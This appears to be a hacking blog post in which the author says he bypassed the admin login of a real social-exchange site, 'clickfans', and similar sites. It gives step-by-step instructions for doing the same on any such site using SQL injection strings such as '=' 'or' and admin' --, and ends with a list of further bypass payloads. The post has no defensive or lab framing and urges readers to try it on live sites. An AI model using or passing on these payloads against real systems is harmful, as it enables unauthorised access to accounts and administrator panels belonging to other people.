I was just browsing through the web and accidently found a site called clickfans I found an error likeUninitialized string offset:.I was just seeking out what it was I just tried Sql injection on the site and it failed then I just tried admin bypass with Unaccepted Charecters and it was a success and I was able to login to admin page.But interesting thing was that most of the other Social Exchange sites was also vulnerable as it was also made up of the same script
Lets Begin H3cking:
Just Find A Social Exchange Site
Find Its Login Page
In Username And Password Field Enter ‘=’ ‘or’
Note: Its Better To Coppy Above Query(‘=’ ‘or’) From Here As It Contains Spaces.
The above query sets a true condition in Sql
Now if the site is Vulnerable you will be logged in to the first user in the database, Gennerally first user will be the Admin
Then I thought how to login to a specific User in the database:
Then I used Sql Ignore Query(--)
Then I thought how to login to a specific User in the database:
Then I used Sql Ignore Query(--)
What this query dids is that it ignores the things after(--) setting the condition to true let us look bellow example
I used the bellow query as Log In name and left the Password to be blank
admin' --
Note: Its Better To Copy Above Query(admin' -- ) From Here As It Contains Spaces.
I used the bellow query as Log In name and left the Password to be blank
admin' --
Note: Its Better To Copy Above Query(admin' -- ) From Here As It Contains Spaces.
So when the query passes the admin is taken as username and the password field is ignored setting the condition to be true,So that you can login to system with username admin without password
Note:You Can Replace Admin With Any Username That Is In The Database Of That Particular Website.
You can try different methords for extracting usernames Like Sql Injection
Other Bypass Queries- admin' --
- admin' #
- admin'/*
- ' or 1=1--
- ' or 1=1#
- ' or 1=1/*
- ') or '1'='1--
- ') or ('1'='1--
Author: Rashin Sundaran
I am a Blogger and E.H.Interested in all tech works like Web Designing, Blogging Creating, Seo Works, Security Works And soon
0 comments:
Post a Comment